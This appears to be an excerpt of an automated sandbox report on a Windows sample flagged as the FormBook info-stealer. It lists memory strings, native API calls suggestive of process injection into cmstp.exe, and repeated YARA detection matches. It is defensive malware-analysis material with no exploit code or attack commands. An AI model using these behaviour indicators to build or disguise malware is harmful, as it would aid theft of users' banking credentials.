          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220096711.00000000007CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00418202 NtReadFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69A10 NtQuerySection,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A6AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69560 NtWriteFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A696D0 NtCreateKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A69650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_028582E0 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02858260 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02858390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_028581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02858202 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285838A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004046C3
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004060D9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004068B0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00401026
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00401208
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00408C50
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041C4FE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041CC90
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B55B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00402D8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041C76C
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B7C9
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041BF8A
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF20A8
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B090
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF28EC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AFE824
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE1002
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2F900
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF22AE
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5EBB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE03DA
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AEDBD2
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF2B28
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3841F
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AED466
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52581
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3D5E0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF25DD
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A20D20
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF2D07
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF1D55
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF2EF7
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A46E30
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AED616
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF1FF1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AFDFCE
          Source: C:\Windows\explorer.exeCode function: 5_2_06413062
          Source: C:\Windows\explorer.exeCode function: 5_2_0640E8F9
          Source: C:\Windows\explorer.exeCode function: 5_2_064112FF
          Source: C:\Windows\explorer.exeCode function: 5_2_0640F362
          Source: C:\Windows\explorer.exeCode function: 5_2_0640E902
          Source: C:\Windows\explorer.exeCode function: 5_2_06411302
          Source: C:\Windows\explorer.exeCode function: 5_2_064147C7
          Source: C:\Windows\explorer.exeCode function: 5_2_064155B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04731002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047428EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047420A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04670D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04694120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0467F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04742D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0468D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047425DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046A2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04696E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04742EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_047422AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04742B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_04741FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0473DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046AEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02842FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285C76C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285C4FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02848C50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02842D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02842D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B55B
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: String function: 00A2B150 appears 45 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 0467B150 appears 35 times
          Source: LWlcpDjYIQ.exe, 00000000.00000003.215702274.000000001EE2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220134452.0000000002260000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000000.00000002.220083689.00000000007B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exe, 00000002.00000002.256830286.0000000000CAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LWlcpDjYIQ.exe
          Source: LWlcpDjYIQ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
